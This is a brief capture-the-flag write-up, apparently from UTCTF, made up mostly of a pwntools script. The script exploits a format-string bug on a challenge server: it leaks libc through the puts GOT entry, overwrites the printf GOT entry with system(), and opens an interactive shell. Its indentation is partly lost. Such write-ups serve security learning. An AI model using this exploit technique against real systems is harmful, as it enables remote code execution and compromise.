Rating: 1.0
Format String attack
Leak libc and hijack printf got to system()
```python
from pwn import *
r = remote("binary.utctf.live",9003)
r.recvuntil("do?\n")
p = b"%7$s "
p += p64(0x601018) #puts got
r.sendline(p)
puts = u64(r.recvline().split()[0].ljust(8,b'\x00'))
libc = puts-0x6f690
print("libc: "+hex(libc))
system = libc+0x45390
towrite = system%0x100000000
print(hex(towrite))
wl = []
wl.append([towrite%0x10000, 0x601020])
wl.append([towrite//0x10000, 0x601022])
#swap = lambda a,b: b,a
if wl[0][0]>wl[1][0]:
wl[0],wl[1] = wl[1],wl[0]
print(wl)
p = (b"%%%dc%%10$hn%%%dc%%11$hn" % (wl[0][0],wl[1][0]-wl[0][0])).ljust(32,b' ')
p += p64(wl[0][1])+p64(wl[1][1])
print(p)
print(len(p))
r.sendlineafter("do?\n",p)
r.interactive()
```
